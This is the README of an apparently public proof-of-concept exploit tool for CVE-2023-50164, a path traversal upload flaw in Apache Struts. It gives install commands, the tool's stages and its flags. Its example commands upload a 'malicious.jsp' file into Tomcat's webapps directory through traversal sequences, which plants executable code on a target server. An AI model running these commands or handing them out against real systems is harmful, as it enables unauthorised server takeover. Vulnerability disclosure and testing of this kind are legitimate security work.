PoC for CVE-2023-50164 === Install To install this tool you must have Go version at least 1.20 installed and configured. $ go install github.com/dwisiswant0/cve-2023-50164-poc@latest Alternatively, you can compile it by DIY: $ git clone http://github.com/dwisiswant0/cve-2023-50164-poc cve-2023-50164-poc/ $ cd $_ $ go build . How it Works? This tool operates through a series of stages to execute the exploit. For instance, if your want to upload `/path/to/file-you-want-to-upload.txt` file, the tool proceeds as follows: 1. It compresses the specified file into a WAR file, generating a `file-you-want-to-upload.war` in the OS-specific temporary directory. Thus, the tool assumes that the servlet context file path is `/file-you-want-to-upload/file-you-want-to-upload.txt`. 2. It checks whether the servlet context file path already exists. If it does, the tool immediately returns an error. 3. The tool attempts to upload the WAR file by manipulating file upload parameters. 4. Subsequently, it double-checks the availability (status code 200) of the servlet context file path, indicating successful file upload. Usage $ cve-2023-50164-poc -h PoC for CVE-2023-50164 -- coded by @dwisiswant0 Usage: cve-2023-50164-poc -u <URL> -f <FILE> -p <PATH> Options: -u, --url <URL> Specify the upload endpoint URL -f, --file <FILE> Provide the payload file for uploading -t, --traverse-seq <N> Generate traversal sequences N times (default: "0") -p, --path <PATH> Specify the path to the accessible root directory -w, -win, --windows Converts slash ("/") chars to Windows separator ("\") Example: cve-2023-50164-poc -u http://host/path/to/upload.action -f foo.txt -t 1 -p webapps cve-2023-50164-poc -u http://host/upload/upload.action -f malicious.jsp -t 2 -p /opt/tomcat/webapps Notes 1. `jar` bin should be present in your system's $PATH. 2. The target path should be accessible root path, such as `/var/lib/jetty/webapps` for Jetty or `/opt/tomcat/webapps` for Apache Tomcat. 3. The default traversal sequences is zero ("0"), you can enter traverse sequences manually for the `-p`/`--path` flag value, e.g. `/../webapps` or `/../../opt/tomcat/webapps`. The traversal sequences will differ for each servlet. 4. The `-w`/`-win`/`--windows` flag is exclusively employed when the servlet operates on a Windows server. Disclaimer Using this tool to attack targets without mutual consent is illegal. Users must follow local, state, and federal laws. The developer ("dwisiswant0"/"Dwi Siswanto") are NOT responsible for any damage caused by misuse of the tool. License This tool is licensed under WTFPL v2 (DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE). See COPYING.
muhammedabdelkader/cve-2023-50164-poc
Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164")
GoWTFPL